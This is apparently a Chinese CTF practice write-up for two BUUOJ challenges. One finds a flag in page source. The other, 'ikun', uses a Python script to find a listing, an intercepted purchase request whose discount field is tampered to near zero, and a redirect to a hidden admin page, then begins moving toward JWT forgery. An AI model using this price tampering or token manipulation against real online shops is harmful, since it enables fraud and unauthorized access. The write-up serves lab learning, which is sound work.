[BSidesCF 2019]Futurella

打开网页，发现一段外星人乱码，按F12打开开发者工具，查看源代码，发现flag。

[CISCN2019 华北赛区 Day1 Web2]ikun

打开网页，先注册登录，根据提示：ikun们冲鸭,一定要买到lv6!!!，说明我们要买个六级号，所以我们用脚本搜索六级号在哪一页：

import requests
for i in range(1,1000):
    url = "<http://0a047e4f-ced1-4f90-9dcd-663cef470c0f.node3.buuoj.cn/shop?page={}>"
    url = url.format(i)
    print(url)
    r = requests.get(url)
    if "lv6.png" in r.text and r.status_code == 200:
        print("find it:" ,url)
        break

最后发现在181页，到181页点击购买，同时用burp suite拦截请求：

POST /shopcar HTTP/1.1
Host: 36b85929-6539-4426-9896-e26feab990ea.node4.buuoj.cn
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: <http://36b85929-6539-4426-9896-e26feab990ea.node4.buuoj.cn>
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: <http://36b85929-6539-4426-9896-e26feab990ea.node4.buuoj.cn/shopcar>
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: _xsrf=2|3838073a|d9aeab83c56fb9d3c045fd385aeb54a5|1626027539; JWT=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6IjEyMyJ9.t_quUTD2cAx9tGvCi1tmfSmgP_z_hr2N8lx_Ij5bh78; commodity_id="2|1:0|10:1626027606|12:commodity_id|8:MTYyNA==|02ef09725be9c5bcf6002e383a11f1ccfad68a4696d9d4880f626114676c32c6"
Connection: close

_xsrf=2%7Ca5eaf832%7C447c548b58bd46db5d970230c739abad%7C1626027539&id=1624&price=1145141919.0&discount=0.8

将discount折扣改成0.000000001，然后发送请求，响应为：

HTTP/1.1 302 Found
Server: openresty
Date: Sun, 11 Jul 2021 18:21:00 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
Location: /b1g_m4mber

发现新网页，在浏览器输入url：

<http://4683139b-3505-4d17-970d-db6537af0224.node4.buuoj.cn/b1g_m4mber>

页面提示只允许admin访问，刷新拦截请求：

GET /b1g_m4mber HTTP/1.1
Host: 36b85929-6539-4426-9896-e26feab990ea.node4.buuoj.cn
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: _xsrf=2|3838073a|d9aeab83c56fb9d3c045fd385aeb54a5|1626027539; JWT=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6IjEyMyJ9.t_quUTD2cAx9tGvCi1tmfSmgP_z_hr2N8lx_Ij5bh78; commodity_id="2|1:0|10:1626027606|12:commodity_id|8:MTYyNA==|02ef09725be9c5bcf6002e383a11f1ccfad68a4696d9d4880f626114676c32c6"
If-None-Match: "c63998d5bdcbf56c96cd396256e18ee05bfc4f3e"
Connection: close

发现JWT字段，想到利用JWT获得权限。

Json web token (JWT), 是为了在网络应用环境间传递声明而执行的一种基于JSON的开放标准（(RFC 7519).该token被设计为紧凑且安全的，特别适用于分布式站点的单点登录（SSO）场景。JWT的声明一般被用来在身份提供者和服务提供者间传递被认证的用户身份信息，以便于从资源服务器获取资源，也可以增加一些额外的其它业务逻辑所必须的声明信息，该token也可直接被用于认证，也可被加密。

References

五分钟带你了解啥是JWT

什么是 JWT -- JSON WEB TOKEN

JWT官网：